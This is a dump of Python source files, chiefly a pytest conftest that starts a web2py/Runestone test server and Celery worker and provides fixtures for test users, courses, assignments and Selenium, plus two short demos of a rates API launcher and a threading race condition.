source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
rates_api_server.py | """ rates api server """
from contextlib import contextmanager
from collections.abc import Generator
import multiprocessing as mp
import requests
from requests.exceptions import RequestException
from rates_demo.rates_api import start_rates_api
@contextmanager
def rates_api_server() -> Generator[None, None, None]:
    """Run the rates API in a child process for the duration of a ``with`` block.

    Starts the server, polls its ``/check`` endpoint until it responds, yields
    control to the caller, and always terminates the child process on exit —
    even if the caller's block raises.
    """
    import time  # local import: only needed for the readiness poll

    rates_api_process = mp.Process(target=start_rates_api)
    rates_api_process.start()
    try:
        # Poll until the server answers. Sleep between attempts so we don't
        # busy-spin while the child boots, and bound each request with a
        # timeout so a wedged server can't hang the poll forever.
        while True:
            try:
                requests.request("GET", "http://127.0.0.1:5000/check", timeout=1)
                break
            except RequestException:
                # Covers requests' ConnectionError subclass as well, so a
                # separate ``except ConnectionError`` clause is unnecessary.
                time.sleep(0.1)
        yield
    finally:
        # Always shut the child down, then reap it so no zombie remains.
        rates_api_process.terminate()
        rates_api_process.join()
|
thread-3.py | #!/usr/bin/env python
#coding=utf8
"""
# Author: kellanfan
# Created Time : Fri 21 Jul 2017 04:52:07 PM CST
# File Name: thread-3.py
# Description:
"""
import time, threading
# Assume this is your bank balance; shared state mutated by both threads below.
balance = 0
def change_it(n):
    """Deposit then withdraw ``n``; the net effect on ``balance`` should be 0.

    Without a lock, the read-modify-write pairs from two threads can
    interleave, so the final balance is not guaranteed to be zero — this is
    the race the script demonstrates.
    """
    global balance
    balance += n
    balance -= n
def run_thread(n):
    """Run 100,000 deposit/withdraw cycles with amount ``n``."""
    for _ in range(100000):
        change_it(n)
# Start two competing threads and wait for both to finish. With no locking,
# the printed balance is frequently non-zero, demonstrating the race in
# ``change_it``.
t1 = threading.Thread(target=run_thread, args=(5,))
t2 = threading.Thread(target=run_thread, args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
# ``print balance`` is Python 2-only syntax; the parenthesized call form
# behaves identically on Python 2 and works on Python 3.
print(balance)
|
conftest.py | # ***************************************
# |docname| - pytest fixtures for testing
# ***************************************
#
# To get started on running tests, see tests/README.rst
#
# These fixtures start the web2py server then submit requests to it.
#
# **NOTE:** Make sure you don't have another server running, because it will grab the requests instead of letting the test server respond to requests.
#
# The overall testing approach is functional: rather than test a function, this file primarily tests endpoints on the web server. To accomplish this:
#
# - This file includes the `web2py_server` fixture to start a web2py server, and a fixture (`test_client`) to make requests of it. To make debug easier, the `test_client` class saves the HTML of a failing test to a file, and also saves any web2py tracebacks in the HTML form to a file.
# - The `runestone_db` and related classes provide the ability to access the web2py database directory, in order to set up and tear down test. In order to leave the database unchanged after a test, almost all routines that modify the database are wrapped in a context manager; on exit, then delete any modifications.
#
# .. contents::
#
# Imports
# =======
# These are listed in the order prescribed by `PEP 8
# <http://www.python.org/dev/peps/pep-0008/#imports>`_.
#
# Standard library
# ----------------
import sys
import time
import subprocess
from io import open
import json
import os
import re
from threading import Thread
import datetime
from shutil import rmtree, copytree
# Third-party imports
# -------------------
from gluon.contrib.webclient import WebClient
import gluon.shell
from html5validator.validator import Validator
import pytest
from pyvirtualdisplay import Display
# Import a shared fixture.
from runestone.shared_conftest import _SeleniumUtils, selenium_driver # noqa: F401
from selenium import webdriver
from selenium.common.exceptions import TimeoutException
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from urllib.error import HTTPError, URLError
from urllib.request import urlopen
# Required to allow use of this class on a module-scoped fixture.
from _pytest.monkeypatch import MonkeyPatch
# Local imports
# -------------
from .utils import COVER_DIRS, DictToObject
from .ci_utils import xqt, pushd
# Set this to False if you want to turn off all web page validation.
W3_VALIDATE = True
# Pytest setup
# ============
# Add `command-line options <http://doc.pytest.org/en/latest/example/parametrize.html#generating-parameters-combinations-depending-on-command-line>`_.
def pytest_addoption(parser):
    """Register Runestone-specific command-line flags with pytest.

    Per the pytest ``pytest_addoption`` hook API, options follow argparse
    conventions.
    """
    for flag, help_text in (
        ("--skipdbinit", "Skip initialization of the test database."),
        ("--skip_w3_validate", "Skip W3C validation of web pages."),
    ):
        parser.addoption(flag, action="store_true", help=help_text)
# Output a coverage report when testing is done. See https://docs.pytest.org/en/latest/reference.html#_pytest.hookspec.pytest_terminal_summary.
def pytest_terminal_summary(terminalreporter):
    """Write a coverage report to the terminal when testing is done."""
    try:
        proc = xqt(
            "{} -m coverage report".format(sys.executable),
            # Capture the output from the report.
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            universal_newlines=True,
        )
    except subprocess.CalledProcessError as e:
        report = "Error in coverage report.\n{}".format(e.stdout + e.stderr)
    else:
        report = proc.stdout + proc.stderr
    terminalreporter.write_line(report)
# Utilities
# =========
# A simple data-struct object.
class _object(object):
pass
# Create a web2py controller environment. This is taken from pieces of ``gluon.shell.run``. It returns a ``dict`` containing the environment.
def web2py_controller_env(
    # _`application`: The name of the application to run in, as a string.
    application,
):
    """Build a web2py controller environment ``dict`` for *application*.

    Pieced together from parts of ``gluon.shell.run``: loads the app's models
    and applies any ``pythonrc`` customizations.
    """
    environment = gluon.shell.env(application, import_models=True)
    environment.update(gluon.shell.exec_pythonrc())
    return environment
# Fixtures
# ========
#
# web2py access
# -------------
# These fixtures provide access to the web2py Runestone server and its environment.
@pytest.fixture(scope="session")
def web2py_server_address():
    """Session-wide address of the locally-hosted web2py test server."""
    return "http://127.0.0.1:8000"
# This fixture starts and shuts down the web2py server.
#
# Execute this `fixture <https://docs.pytest.org/en/latest/fixture.html>`_ once per `session <https://docs.pytest.org/en/latest/fixture.html#scope-sharing-a-fixture-instance-across-tests-in-a-class-module-or-session>`_.
@pytest.fixture(scope="session")
def web2py_server(runestone_name, web2py_server_address, pytestconfig):
    """Session fixture: run a web2py server plus a Celery worker for testing.

    Unless ``--skipdbinit`` was given, this also resets the test database and
    builds/deploys the test book. Yields the server's ``Popen`` object (with a
    ``password`` attribute added); terminates both processes on teardown.
    """
    password = "pass"
    os.environ["WEB2PY_CONFIG"] = "test"
    # HINT: make sure that ``0.py`` has something like the following, that reads this environment variable:
    #
    # .. code:: Python
    #    :number-lines:
    #
    #    config = environ.get("WEB2PY_CONFIG","production")
    #
    #    if config == "production":
    #        settings.database_uri = environ["DBURL"]
    #    elif config == "development":
    #        settings.database_uri = environ.get("DEV_DBURL")
    #    elif config == "test":
    #        settings.database_uri = environ.get("TEST_DBURL")
    #    else:
    #        raise ValueError("unknown value for WEB2PY_CONFIG")
    #
    # HINT: make sure that you export ``TEST_DBURL`` in your environment; it is
    # not set here because it's specific to the local setup, possibly with a
    # password, and thus can't be committed to the repo.
    assert os.environ["TEST_DBURL"]
    # Extract the components of the DBURL. The expected format is ``postgresql://user:password@netloc/dbname``, a simplified form of the `connection URI <https://www.postgresql.org/docs/9.6/static/libpq-connect.html#LIBPQ-CONNSTRING>`_.
    empty1, postgres_ql, pguser, pgpassword, pgnetloc, dbname, empty2 = re.split(
        "^postgres(ql)?://(.*):(.*)@(.*)/(.*)$", os.environ["TEST_DBURL"]
    )
    assert (not empty1) and (not empty2)
    os.environ["PGPASSWORD"] = pgpassword
    os.environ["PGUSER"] = pguser
    os.environ["DBHOST"] = pgnetloc
    rs_path = "applications/{}".format(runestone_name)
    # Assume we are running with working directory in tests.
    if pytestconfig.getoption("skipdbinit"):
        print("Skipping DB initialization.")
    else:
        # In the future, to print the output of the init/build process, see `pytest #1599 <https://github.com/pytest-dev/pytest/issues/1599>`_ for code to enable/disable output capture inside a test.
        #
        # Make sure runestone_test is nice and clean -- this will remove many
        # tables that web2py will then re-create.
        xqt("rsmanage --verbose initdb --reset --force")
        # Copy the test book to the books directory.
        rmtree("{}/books/test_course_1".format(rs_path), ignore_errors=True)
        # Sometimes this fails for no good reason on Windows. Retry.
        for retry in range(100):
            try:
                copytree(
                    "{}/tests/test_course_1".format(rs_path),
                    "{}/books/test_course_1".format(rs_path),
                )
                break
            except OSError:
                # Only give up (re-raise) on the final attempt.
                if retry == 99:
                    raise
        # Build the test book to add in db fields needed.
        with pushd(
            "{}/books/test_course_1".format(rs_path)
        ), MonkeyPatch().context() as m:
            # The runestone build process only looks at ``DBURL``.
            m.setenv("DBURL", os.environ["TEST_DBURL"])
            xqt(
                "{} -m runestone build --all".format(sys.executable),
                "{} -m runestone deploy".format(sys.executable),
            )
    # Start coverage from a clean slate; the server below runs with --append.
    xqt("{} -m coverage erase".format(sys.executable))
    # For debug:
    #
    # #. Uncomment the next three lines.
    # #. Set ``WEB2PY_CONFIG`` to ``test``; all the other usual Runestone environment variables must also be set.
    # #. Run ``python -m celery --app=scheduled_builder worker --pool=gevent --concurrency=4 --loglevel=info`` from ``applications/runestone/modules`` to use the scheduler. I'm assuming the redis server (which the tests needs regardless of debug) is also running.
    # #. Run a test (in a separate window). When the debugger stops at the lines below:
    #
    #    #. Run web2py manually to see all debug messages. Use a command line like ``python web2py.py -a pass``.
    #    #. After web2py is started, type "c" then enter to continue the debugger and actually run the tests.
    ##import pdb; pdb.set_trace()
    ##yield DictToObject(dict(password=password))
    ##return
    # Start the web2py server and the `web2py scheduler <http://web2py.com/books/default/chapter/29/04/the-core#Scheduler-Deployment>`_.
    web2py_server = subprocess.Popen(
        [
            sys.executable,
            "-m",
            "coverage",
            "run",
            "--append",
            "--source=" + COVER_DIRS,
            "web2py.py",
            "-a",
            password,
            "--no_gui",
            "--minthreads=10",
            "--maxthreads=20",
        ],
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        # Produce text (not binary) output for nice output in ``echo()`` below.
        universal_newlines=True,
    )
    # Wait for the webserver to come up.
    for tries in range(50):
        try:
            urlopen(web2py_server_address, timeout=5)
        except URLError:
            # Wait for the server to come up.
            time.sleep(0.1)
        else:
            # The server is up. We're done.
            break
    # Run Celery. Per https://github.com/celery/celery/issues/3422, it sounds like celery doesn't support coverage, so omit it.
    celery_process = subprocess.Popen(
        [
            sys.executable,
            "-m",
            "celery",
            "--app=scheduled_builder",
            "worker",
            "--pool=gevent",
            "--concurrency=4",
            "--loglevel=info",
        ],
        # Celery must be run in the ``modules`` directory, where the worker is defined.
        cwd="{}/modules".format(rs_path),
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE,
        # Produce text (not binary) output for nice output in ``echo()`` below.
        universal_newlines=True,
    )
    # Start a thread to read web2py output and echo it.
    def echo(popen_obj, description_str):
        # Blocks until the process exits, then prints all its captured output.
        stdout, stderr = popen_obj.communicate()
        print("\n" "{} stdout\n" "--------------------\n".format(description_str))
        print(stdout)
        print("\n" "{} stderr\n" "--------------------\n".format(description_str))
        print(stderr)
    echo_threads = [
        Thread(target=echo, args=(web2py_server, "web2py server")),
        Thread(target=echo, args=(celery_process, "celery process")),
    ]
    # TODO: Redis for Windows.
    for echo_thread in echo_threads:
        echo_thread.start()
    # Save the password used.
    web2py_server.password = password
    # Wait for the server to come up. The delay varies; this is a guess.
    # After this comes the `teardown code <https://docs.pytest.org/en/latest/fixture.html#fixture-finalization-executing-teardown-code>`_.
    yield web2py_server
    # Terminate the server and schedulers to give web2py time to shut down gracefully.
    web2py_server.terminate()
    celery_process.terminate()
    for echo_thread in echo_threads:
        echo_thread.join()
# The name of the Runestone controller. It must be module scoped to allow the ``web2py_server`` to use it.
@pytest.fixture(scope="session")
def runestone_name():
    """Name of the Runestone web2py application under test.

    Session-scoped so the ``web2py_server`` fixture can depend on it.
    """
    return "runestone"
# The environment of a web2py controller.
@pytest.fixture
def runestone_env(runestone_name):
    """Yield a web2py controller environment, closing its DB afterwards."""
    controller_env = web2py_controller_env(runestone_name)
    yield controller_env
    # Close the database connection after the test completes.
    controller_env["db"].close()
# Create fixture providing a web2py controller environment for a Runestone application.
@pytest.fixture
def runestone_controller(runestone_env):
    """Wrap the controller environment dict for attribute-style access."""
    return DictToObject(runestone_env)
# Database
# --------
# This fixture provides access to a clean instance of the Runestone database.
#
# Provide access to the Runestone database through a fixture. After a test runs,
# restore the database to its initial state.
@pytest.fixture
def runestone_db(runestone_controller):
    """Yield the Runestone database; restore its state after the test."""
    db = runestone_controller.db
    yield db
    # **Restore the database state after the test finishes**
    ##------------------------------------------------------
    # Rollback changes, which ensures that any errors in the database connection
    # will be cleared.
    db.rollback()
    # This list was generated by running the following query, taken from
    # https://dba.stackexchange.com/a/173117. Note that the query excludes
    # specific tables, which the ``runestone build`` populates and which
    # should not be modified otherwise. One method to identify these tables
    # which should not be truncated is to run ``pg_dump --data-only
    # $TEST_DBURL > out.sql`` on a clean database, then inspect the output to
    # see which tables have data. It also excludes all the scheduler tables,
    # since truncating these tables makes the process take a lot longer.
    #
    # The query is:
    ## SELECT input_table_name || ',' AS truncate_query FROM(SELECT table_schema || '.' || table_name AS input_table_name FROM information_schema.tables WHERE table_schema NOT IN ('pg_catalog', 'information_schema') AND table_name NOT IN ('questions', 'source_code', 'chapters', 'sub_chapters', 'scheduler_run', 'scheduler_task', 'scheduler_task_deps', 'scheduler_worker') AND table_schema NOT LIKE 'pg_toast%') AS information order by input_table_name;
    db.executesql(
        """TRUNCATE
        public.assignment_questions,
        public.assignments,
        public.auth_cas,
        public.auth_event,
        public.auth_group,
        public.auth_membership,
        public.auth_permission,
        public.auth_user,
        public.clickablearea_answers,
        public.code,
        public.codelens_answers,
        public.course_attributes,
        public.course_instructor,
        public.course_practice,
        public.courses,
        public.dragndrop_answers,
        public.fitb_answers,
        public.grades,
        public.lp_answers,
        public.invoice_request,
        public.lti_keys,
        public.mchoice_answers,
        public.parsons_answers,
        public.payments,
        public.practice_grades,
        public.question_grades,
        public.question_tags,
        public.shortanswer_answers,
        public.sub_chapter_taught,
        public.tags,
        public.timed_exam,
        public.useinfo,
        public.user_biography,
        public.user_chapter_progress,
        public.user_courses,
        public.user_state,
        public.user_sub_chapter_progress,
        public.user_topic_practice,
        public.user_topic_practice_completion,
        public.user_topic_practice_feedback,
        public.user_topic_practice_log,
        public.user_topic_practice_survey,
        public.web2py_session_runestone CASCADE;
        """
    )
    db.commit()
# Provide a class for manipulating the Runestone database.
class _RunestoneDbTools(object):
    """Helpers to create courses and instructors directly in the database."""
    def __init__(self, runestone_db):
        # The web2py DAL instance from the ``runestone_db`` fixture.
        self.db = runestone_db
    # Create a new course. It returns an object with information about the created course.
    def create_course(
        self,
        # The name of the course to create, as a string.
        course_name="test_child_course_1",
        # The start date of the course, as a string.
        term_start_date="2000-01-01",
        # The value of the ``login_required`` flag for the course.
        login_required=True,
        # The base course for this course. If ``None``, it will use ``course_name``.
        base_course="test_course_1",
        # The student price for this course.
        student_price=None,
    ):
        # Sanity check: a course with this name must not already exist.
        db = self.db
        assert not db(db.courses.course_name == course_name).select().first()
        # Create the base course if it doesn't exist (recursive call with the
        # base course as its own base).
        if course_name != base_course and not db(
            db.courses.course_name == base_course
        ).select(db.courses.id):
            self.create_course(
                base_course, term_start_date, login_required, base_course, student_price
            )
        # Store these values in an object for convenient access.
        obj = _object()
        obj.course_name = course_name
        obj.term_start_date = term_start_date
        obj.login_required = login_required
        obj.base_course = base_course
        obj.student_price = student_price
        obj.course_id = db.courses.insert(
            course_name=course_name,
            base_course=obj.base_course,
            term_start_date=term_start_date,
            login_required=login_required,
            student_price=student_price,
        )
        db.commit()
        return obj
    def make_instructor(
        self,
        # The ID of the user to make an instructor.
        user_id,
        # The ID of the course in which the user will be an instructor.
        course_id,
    ):
        # Returns the ID of the new ``course_instructor`` record.
        db = self.db
        course_instructor_id = db.course_instructor.insert(
            course=course_id, instructor=user_id
        )
        db.commit()
        return course_instructor_id
# Present ``_RunestoneDbTools`` as a fixture.
@pytest.fixture
def runestone_db_tools(runestone_db):
    """Expose the ``_RunestoneDbTools`` helpers as a fixture."""
    return _RunestoneDbTools(runestone_db)
# HTTP client
# -----------
# Provide access to Runestone through HTTP.
#
# Given the ``test_client.text``, prepare to write it to a file.
def _html_prep(text_str):
return text_str.replace("\r\n", "\n").encode("utf-8")
# Create a client for accessing the Runestone server.
class _TestClient(WebClient):
    """HTTP client for the Runestone server with validation and debug aids.

    On a failed assertion the fetched HTML is saved to a file; on a web2py
    ticket the server traceback is fetched and saved to a file.
    """
    def __init__(
        self,
        web2py_server,
        web2py_server_address,
        runestone_name,
        tmp_path,
        pytestconfig,
    ):
        # Keep the fixtures needed later for validation and traceback retrieval.
        self.web2py_server = web2py_server
        self.web2py_server_address = web2py_server_address
        self.tmp_path = tmp_path
        self.pytestconfig = pytestconfig
        super(_TestClient, self).__init__(
            "{}/{}/".format(self.web2py_server_address, runestone_name), postbacks=True
        )
    # Use the W3C validator to check the HTML at the given URL.
    def validate(
        self,
        # The relative URL to validate.
        url,
        # An optional string that, if provided, must be in the text returned by the server. If this is a sequence of strings, all of the provided strings must be in the text returned by the server.
        expected_string="",
        # The number of validation errors expected. If None, no validation is performed.
        expected_errors=None,
        # The expected status code from the request.
        expected_status=200,
        # All additional keyword arguments are passed to the ``post`` method.
        **kwargs,
    ):
        """Request *url*, check status/content, optionally W3C-validate.

        Returns the response text ("" when an expected HTTP error occurred).
        """
        try:
            try:
                self.post(url, **kwargs)
            except HTTPError as e:
                # If this was the expected result, return.
                if e.code == expected_status:
                    # Since this is an error of some type, these parameters must be empty, since they can't be checked.
                    assert not expected_string
                    assert not expected_errors
                    return ""
                else:
                    raise
            assert self.status == expected_status
            if expected_string:
                if isinstance(expected_string, str):
                    assert expected_string in self.text
                else:
                    # Assume ``expected_string`` is a sequence of strings.
                    assert all(string in self.text for string in expected_string)
            if expected_errors is not None and not self.pytestconfig.getoption(
                "skip_w3_validate"
            ):
                # Redo this section using html5validate command line
                vld = Validator(errors_only=True, stack_size=2048)
                tmpname = self.tmp_path / "tmphtml.html"
                with open(tmpname, "w", encoding="utf8") as f:
                    f.write(self.text)
                errors = vld.validate([str(tmpname)])
                assert errors <= expected_errors
            return self.text
        except AssertionError:
            # Save the HTML to make fixing the errors easier. Note that ``self.text`` is already encoded as utf-8.
            validation_file = url.replace("/", "-") + ".html"
            with open(validation_file, "wb") as f:
                f.write(_html_prep(self.text))
            print("Validation failure saved to {}.".format(validation_file))
            raise
        except RuntimeError as e:
            # Provide special handling for web2py exceptions by saving the
            # resulting traceback.
            if e.args[0].startswith("ticket "):
                # Create a client to access the admin interface.
                admin_client = WebClient(
                    "{}/admin/".format(self.web2py_server_address), postbacks=True
                )
                # Log in.
                admin_client.post("", data={"password": self.web2py_server.password})
                assert admin_client.status == 200
                # Get the error.
                error_code = e.args[0][len("ticket ") :]
                admin_client.get("default/ticket/" + error_code)
                assert admin_client.status == 200
                # Save it to a file, replacing characters illegal in filenames.
                traceback_file = (
                    "".join(c if c not in r"\/:*?<>|" else "_" for c in url)
                    + "_traceback.html"
                )
                with open(traceback_file, "wb") as f:
                    f.write(_html_prep(admin_client.text))
                print("Traceback saved to {}.".format(traceback_file))
            raise
    def logout(self):
        # Log out and confirm that the server reports success.
        self.validate("default/user/logout", "Logged out")
    # Always logout after a test finishes.
    def tearDown(self):
        self.logout()
# Present ``_TestClient`` as a fixture.
@pytest.fixture
def test_client(
    web2py_server, web2py_server_address, runestone_name, tmp_path, pytestconfig
):
    """Yield a ``_TestClient``; always log out when the test finishes."""
    client = _TestClient(
        web2py_server, web2py_server_address, runestone_name, tmp_path, pytestconfig
    )
    yield client
    client.tearDown()
# User
# ^^^^
# Provide a method to create a user and perform common user operations.
class _TestUser(object):
    """Register a test user on construction and wrap common user operations."""
    def __init__(
        self,
        # These are fixtures.
        test_client,
        runestone_db_tools,
        # The username for this user.
        username,
        # The password for this user.
        password,
        # The course object returned by ``create_course`` this user will register for.
        course,
        # True if the course is free (no payment required); False otherwise.
        is_free=True,
        # The first name for this user.
        first_name="test",
        # The last name for this user.
        last_name="user",
    ):
        self.test_client = test_client
        self.runestone_db_tools = runestone_db_tools
        self.username = username
        self.first_name = first_name
        self.last_name = last_name
        # Derive a unique e-mail address from the (unique) username.
        self.email = self.username + "@foo.com"
        self.password = password
        self.course = course
        self.is_free = is_free
        # Registration doesn't work unless we're logged out.
        self.test_client.logout()
        # Now, post the registration.
        self.test_client.validate(
            "default/user/register",
            "Support Runestone Interactive" if self.is_free else "Payment Amount",
            data=dict(
                username=self.username,
                first_name=self.first_name,
                last_name=self.last_name,
                # The e-mail address must be unique.
                email=self.email,
                password=self.password,
                password_two=self.password,
                # Note that ``course_id`` is (on the form) actually a course name.
                course_id=self.course.course_name,
                accept_tcp="on",
                donate="0",
                _next="/runestone/default/index",
                _formname="register",
            ),
        )
        # Record IDs
        db = self.runestone_db_tools.db
        self.user_id = (
            db(db.auth_user.username == self.username)
            .select(db.auth_user.id)
            .first()
            .id
        )
    def login(self):
        """Log this user in through the login form."""
        self.test_client.validate(
            "default/user/login",
            data=dict(
                username=self.username, password=self.password, _formname="login"
            ),
        )
    def logout(self):
        """Log this user out."""
        self.test_client.logout()
    def make_instructor(self, course_id=None):
        """Make this user an instructor; returns the course_instructor record ID."""
        # If ``course_id`` isn't specified, use this user's ``course_id``.
        course_id = course_id or self.course.course_id
        return self.runestone_db_tools.make_instructor(self.user_id, course_id)
    # Update this user's profile. If a course was added, it returns that course's ID; otherwise, it returns None.
    def update_profile(
        self,
        # This parameter is passed to ``test_client.validate``.
        expected_string=None,
        # An updated username, or ``None`` to use ``self.username``.
        username=None,
        # An updated first name, or ``None`` to use ``self.first_name``.
        first_name=None,
        # An updated last name, or ``None`` to use ``self.last_name``.
        last_name=None,
        # An updated email, or ``None`` to use ``self.email``.
        email=None,
        # An updated course name, or ``None`` to use ``self.course.course_name``.
        course_name=None,
        # A shortcut for specifying the ``expected_string``, which only applies if ``expected_string`` is not set. Use ``None`` if a course will not be added, ``True`` if the added course is free, or ``False`` if the added course is paid.
        is_free=None,
        # The value of the ``accept_tcp`` checkbox; provide an empty string to leave unchecked. The default value leaves it checked.
        accept_tcp="on",
    ):
        if expected_string is None:
            if is_free is None:
                expected_string = "Course Selection"
            else:
                expected_string = (
                    "Support Runestone Interactive" if is_free else "Payment Amount"
                )
        # Fall back to this user's current values for anything unspecified.
        username = username or self.username
        first_name = first_name or self.first_name
        last_name = last_name or self.last_name
        email = email or self.email
        course_name = course_name or self.course.course_name
        # Perform the update.
        self.test_client.validate(
            "default/user/profile",
            expected_string,
            data=dict(
                username=username,
                first_name=first_name,
                last_name=last_name,
                email=email,
                # Though the field is ``course_id``, it's really the course name.
                course_id=course_name,
                accept_tcp=accept_tcp,
                _next="/runestone/default/index",
                id=str(self.user_id),
                _formname="auth_user/" + str(self.user_id),
            ),
        )
    # Call this after registering for a new course or adding a new course via ``update_profile`` to pay for the course.
    def make_payment(
        self,
        # The `Stripe test tokens <https://stripe.com/docs/testing#cards>`_ to use for payment.
        stripe_token,
        # The course ID of the course to pay for. None specifies ``self.course.course_id``.
        course_id=None,
    ):
        """Pay for a course through the Stripe-backed payment page."""
        course_id = course_id or self.course.course_id
        # Get the signature from the HTML of the payment page.
        self.test_client.validate("default/payment")
        match = re.search(
            '<input type="hidden" name="signature" value="([^ ]*)" />',
            self.test_client.text,
        )
        signature = match.group(1)
        html = self.test_client.validate(
            "default/payment", data=dict(stripeToken=stripe_token, signature=signature)
        )
        assert ("Thank you for your payment" in html) or ("Payment failed" in html)
    def hsblog(self, **kwargs):
        """Post a log entry to ``ajax/hsblog``; returns the parsed JSON reply."""
        # Get the time, rounded down to a second, before posting to the server.
        ts = datetime.datetime.utcnow()
        ts -= datetime.timedelta(microseconds=ts.microsecond)
        # NOTE(review): ``ts`` is computed but never used below — possibly a
        # leftover from a timestamp-verification step; confirm before removing.
        if "course" not in kwargs:
            kwargs["course"] = self.course.course_name
        if "answer" not in kwargs and "act" in kwargs:
            kwargs["answer"] = kwargs["act"]
        # Post to the server.
        return json.loads(self.test_client.validate("ajax/hsblog", data=kwargs))
    def coursechooser(self, course_name):
        """Switch this user's active course to *course_name*."""
        html = self.test_client.validate("default/coursechooser/{}".format(course_name))
        # Make sure this didn't send us to the user profile page to add a course we aren't registered for.
        assert "Course IDs for open courses" not in html
    def removecourse(self, course_name):
        """Remove *course_name* from this user's list of courses."""
        html = self.test_client.validate("default/removecourse/{}".format(course_name))
        assert "Sorry, you cannot remove" not in html
        assert "Course Selection" in html
# Present ``_TestUser`` as a fixture.
@pytest.fixture
def test_user(test_client, runestone_db_tools):
    """Return a factory that builds ``_TestUser`` instances."""
    def _make_user(*args, **kwargs):
        return _TestUser(test_client, runestone_db_tools, *args, **kwargs)
    return _make_user
# Provide easy access to a test user and course.
@pytest.fixture
def test_user_1(runestone_db_tools, test_user):
    """A registered test user in a freshly-created default course."""
    course = runestone_db_tools.create_course()
    return test_user("test_user_1", "password_1", course)
# Assignment
# ^^^^^^^^^^
class _TestAssignment(object):
    """Create an assignment (plus an instructor to own it) and manipulate it."""
    # Class-level counter used to generate unique instructor usernames.
    assignment_count = 0
    def __init__(
        self,
        test_client,
        test_user,
        runestone_db_tools,
        aname,
        course,
        is_visible=False,
    ):
        self.test_client = test_client
        self.runestone_db_tools = runestone_db_tools
        self.assignment_name = aname
        self.course = course
        self.description = "default description"
        self.is_visible = is_visible
        # Default due date: one week from now.
        self.due = datetime.datetime.utcnow() + datetime.timedelta(days=7)
        # Each assignment gets its own instructor user, named uniquely via
        # the class-level counter.
        self.assignment_instructor = test_user(
            "assign_instructor_{}".format(_TestAssignment.assignment_count),
            "password",
            course,
        )
        self.assignment_instructor.make_instructor()
        self.assignment_instructor.login()
        self.assignment_id = json.loads(
            self.test_client.validate(
                "admin/createAssignment", data={"name": self.assignment_name}
            )
        )[self.assignment_name]
        assert self.assignment_id
        _TestAssignment.assignment_count += 1
    def addq_to_assignment(self, **kwargs):
        """Add or update a question on this assignment (default: 1 point)."""
        if "points" not in kwargs:
            kwargs["points"] = 1
        kwargs["assignment"] = self.assignment_id
        res = self.test_client.validate(
            "admin/add__or_update_assignment_question", data=kwargs
        )
        res = json.loads(res)
        assert res["status"] == "success"
    def autograde(self, sid=None):
        """Autograde this assignment, optionally for a single student *sid*."""
        print("autograding", self.assignment_name)
        vars = dict(assignment=self.assignment_name)
        if sid:
            vars["sid"] = sid
        res = json.loads(self.test_client.validate("assignments/autograde", data=vars))
        assert res["message"].startswith("autograded")
        return res
    def questions(self):
        """
        Return a list of all (id, name) values for each question
        in an assignment
        """
        db = self.runestone_db_tools.db
        a_q_rows = db(
            (db.assignment_questions.assignment_id == self.assignment_id)
            & (db.assignment_questions.question_id == db.questions.id)
        ).select(orderby=db.assignment_questions.sorting_priority)
        res = []
        for row in a_q_rows:
            res.append(tuple([row.questions.id, row.questions.name]))
        return res
    def calculate_totals(self):
        """Ask the server to (re)calculate grade totals for this assignment."""
        assert json.loads(
            self.test_client.validate(
                "assignments/calculate_totals",
                data=dict(assignment=self.assignment_name),
            )
        )["success"]
    def make_visible(self):
        """Mark the assignment visible to students and save it."""
        self.is_visible = True
        self.save_assignment()
    def set_duedate(self, newdeadline):
        """
        the newdeadline should be a datetime object
        """
        self.due = newdeadline
        self.save_assignment()
    def save_assignment(self):
        """Persist the assignment's visibility, description, and due date."""
        assert (
            json.loads(
                self.test_client.validate(
                    "admin/save_assignment",
                    data=dict(
                        assignment_id=self.assignment_id,
                        visible="T" if self.is_visible else "F",
                        description=self.description,
                        due=str(self.due),
                    ),
                )
            )["status"]
            == "success"
        )
    def release_grades(self):
        """Release this assignment's grades to students."""
        self.test_client.post(
            "admin/releasegrades",
            data=dict(assignmentid=self.assignment_id, released="yes"),
        )
        assert self.test_client.text == "Success"
@pytest.fixture
def test_assignment(test_client, test_user, runestone_db_tools):
    """Return a factory that builds ``_TestAssignment`` instances."""
    def _make_assignment(*args, **kwargs):
        return _TestAssignment(
            test_client, test_user, runestone_db_tools, *args, **kwargs
        )
    return _make_assignment
# Selenium
# --------
# Provide access to Runestone through a web browser using Selenium. There's a lot of shared code between these tests and the Runestone Component tests using Selenium; see `shared_conftest.py` for details.
#
# Create an instance of Selenium once per testing session.
@pytest.fixture(scope="session")
def selenium_driver_session():
    """Session fixture: a Chrome WebDriver (behind a virtual display on Linux)."""
    # Start a virtual display for Linux.
    is_linux = sys.platform.startswith("linux")
    if is_linux:
        display = Display(visible=0, size=(1280, 1024))
        display.start()
    else:
        display = None
    # Start up the Selenium driver.
    options = Options()
    options.add_argument("--window-size=1200,800")
    # When run as root, Chrome complains ``Running as root without --no-sandbox is not supported. See https://crbug.com/638180.`` Here's a `crude check for being root <https://stackoverflow.com/a/52621917>`_.
    if is_linux and os.geteuid() == 0:
        options.add_argument("--no-sandbox")
    driver = webdriver.Chrome(options=options)
    yield driver
    # Shut everything down.
    driver.close()
    driver.quit()
    if display:
        display.stop()
# Provide additional server methods for Selenium.
class _SeleniumServerUtils(_SeleniumUtils):
    """Server-aware Selenium helpers: login/logout and book URL access."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # The ``_TestUser`` currently logged in through the browser, or None.
        self.user = None
    def login(
        self,
        # A ``_TestUser`` instance.
        test_user,
    ):
        """Log *test_user* in through the web2py login form."""
        self.get("default/user/login")
        # The ``find_element_by_*`` helpers were removed in Selenium 4; use
        # the ``find_element(By.ID, ...)`` form instead.
        self.driver.find_element(By.ID, "auth_user_username").send_keys(
            test_user.username
        )
        self.driver.find_element(By.ID, "auth_user_password").send_keys(
            test_user.password
        )
        self.driver.find_element(By.ID, "login_button").click()
        self.user = test_user
    def logout(self):
        """Log out and wait for the server's confirmation message."""
        self.get("default/user/logout")
        # For some strange reason, the server occasionally doesn't put the "Logged out" message on a logout. ???
        try:
            self.wait.until(
                EC.text_to_be_present_in_element(
                    (By.CSS_SELECTOR, "div.flash"), "Logged out"
                )
            )
        except TimeoutException:
